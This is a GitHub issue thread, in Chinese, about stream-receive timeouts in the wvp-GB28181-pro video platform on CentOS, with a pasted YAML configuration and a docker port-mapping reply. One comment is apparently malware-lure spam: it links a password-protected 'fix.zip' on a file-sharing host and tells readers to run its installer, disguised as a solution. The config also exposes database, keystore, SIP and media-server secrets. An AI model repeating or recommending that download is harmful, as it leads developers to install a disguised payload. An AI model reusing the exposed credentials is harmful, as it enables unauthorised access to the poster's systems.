### ISSUE TITLE
技术咨询：收流超时

### ISSUE THREAD

**Issue by MightyTiger98** [648540858/wvp-GB28181-pro#1594]
**环境信息:**

 - 1. 部署方式 wvp-pro docker / zlm(docker) + 编译wvp-pro/ wvp-prp + zlm都是编译部署/-wvp+zlm编译部署
 - 2. 部署环境 windows / ubuntu/ centos ... -centos8
 - 3. 端口开放情况-已开放
 - 4. 是否是公网部署 -公网部署
 - 5. 是否使用https-无
 - 6. 方便的话提供下使用的设备品牌或平台
 - 7. 你做过哪些尝试
 - 8. 代码更新时间

**内容描述:**
新服务器上部署了摄像头一直提示收流超时，确定的是两个摄像头是可以接入国标的，有另一台服务器也部署了wvp，摄像头接入是正常的
配置文件yml
spring:
  # 设置接口超时时间
  mvc:
    async:
      request-timeout: 20000
  thymeleaf:
    cache: false
  # [可选]上传文件大小限制
  servlet:
    multipart:
      max-file-size: 10MB
      max-request-size: 100MB
  cache:
    type: redis
  # REDIS数据库配置
  redis:
    # [必须修改] Redis服务器IP, REDIS安装在本机的,使用127.0.0.1
    host: 127.0.0.1
    # [必须修改] 端口号
    port: 6397
    # [可选] 数据库 DB
    database: 7
    # [可选] 访问密码,若你的redis服务器没有设置密码，就不需要用密码去连接
    password: 
    # [可选] 超时时间
    timeout: 10000
    # mysql数据源
  datasource:
    dynamic:
      primary: master
      datasource:
        master:
          type: com.zaxxer.hikari.HikariDataSource
          driver-class-name: com.mysql.cj.jdbc.Driver
          url: jdbc:mysql://127.0.0.1:6033/wvp?useUnicode=true&characterEncoding=UTF8&rewriteBatchedStatements=true&serverTimezone=PRC&useSSL=false&allowMultiQueries=true
          username: jckj
          password: jckj123
          hikari:
            connection-timeout: 20000             # 是客户端等待连接池连接的最大毫秒数
            initialSize: 50                       # 连接池初始化连接数
            maximum-pool-size: 200                # 连接池最大连接数
            minimum-idle: 10                       # 连接池最小空闲连接数
            idle-timeout: 300000                  # 允许连接在连接池中空闲的最长时间（以毫秒为单位）
            max-lifetime: 1200000                 # 是池中连接关闭后的最长生命周期（以毫秒为单位)
#[可选] WVP监听的HTTP端口, 网页和接口调用都是这个端口
server:
  port: 10005
  # [可选] HTTPS配置， 默认不开启
  ssl:
    # [可选] 是否开启HTTPS访问
    enabled: false
    # [可选] 证书文件路径，放置在resource/目录下即可，修改xxx为文件名
    key-store: classpath:test.monitor.89iot.cn.jks
    # [可选] 证书密码
    key-store-password: gpf64qmw
    # [可选] 证书类型， 默认为jks，根据实际修改
    key-store-type: JKS

# 作为28181服务器的配置
sip:
  # [可选] 28181服务监听的端口
  port: 10006
  # 根据国标6.1.2中规定，domain宜采用ID统一编码的前十位编码。国标附录D中定义前8位为中心编码（由省级、市级、区级、基层编号组成，参照GB/T 2260-2007）
  # 后两位为行业编码，定义参照附录D.3
  # 3701020049标识山东济南历下区 信息行业接入
  # [可选]
  domain: 9121060000
  # [可选]
  id: 91110600007000000001
  # [可选] 默认设备认证密码，后续扩展使用设备单独密码, 移除密码将不进行校验
  password: jckjvideo2024
  # 是否存储alarm信息
  alarm: false

#zlm 默认服务器配置
media:
  id: jckj0002
  # [必须修改] zlm服务器的内网IP
  ip: 192.168.1.4
  #stream-ip: 192.168.1.4
  #sdp-ip: 192.168.1.4
  # [可选] 有公网IP就配置公网IP, 不可用域名
  wan_ip:
  # [必须修改] zlm服务器的http.port
  http-port: 20000
  # [可选] zlm服务器访问WVP所使用的IP, 默认使用127.0.0.1，zlm和wvp没有部署在同一台服务器时必须配置
  hook-ip: 127.0.0.1
  # [必选选] zlm服务器的hook.admin_params=secret
  secret: 2N18GiWsie7zR4UVHsONUVEO7BfC4KKQ
  # 启用多端口模式, 多端口模式使用端口区分每路流，兼容性更好。 单端口使用流的ssrc区分， 点播超时建议使用多端口测试
  rtp:
    # [可选] 是否启用多端口模式, 开启后会在portRange范围内选择端口用于媒体流传输
    enable: true
    # [可选] 在此范围内选择端口用于媒体流传输, 必须提前在zlm上配置该属性，不然自动配置此属性可能不成功
    port-range: 21000,29999 # 端口范围
    # [可选] 国标级联在此范围内选择端口发送媒体流,
    send-port-range: 21000,29999 # 端口范围
# [根据业务需求配置]
user-settings:
  # 点播/录像回放 等待超时时间,单位：毫秒
  play-timeout: 180000
  # [可选] 自动点播， 使用固定流地址进行播放时，如果未点播则自动进行点播, 需要rtp.enable=true
  auto-apply-play: true
  # 推流直播是否录制
  record-push-live: false
  # 国标是否录制
  record-sip: false
  # 国标点播 按需拉流, true：有人观看拉流，无人观看释放， false：拉起后不自动释放
  stream-on-demand: true

**截图**  
![ecac1f20494ba9bccb9222d0d805f0f](https://github.com/user-attachments/assets/a2927ce8-ff70-4871-8324-0636a43b7e1c)
![927f262b9e560240932bd47150fd115](https://github.com/user-attachments/assets/8b38cef7-3056-44d7-a390-4bd7276f10be)

**抓包文件**
  点播的抓包信息
![image](https://github.com/user-attachments/assets/e7263ef0-855f-4c65-9ca6-0f094d979f29)

**日志**
```
日志内容放这里， 文件的话请直接上传
```

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yanpengfei-git** [comment]
docker 启动zlm的话需要 把port-range: 50000,50300  打开，我的启动命令是docker run -id -p 1935:1935 -p 9092:80 -p 9093:443 -p 8554:554 -p 10000:10000 -p 10000:10000/udp -p 8000:8000/udp -p 9000:9000/udp -p 50000-50300:50000-50300 -p 50000-50300:50000-50300/udp zlmediakit/zlmediakit:master
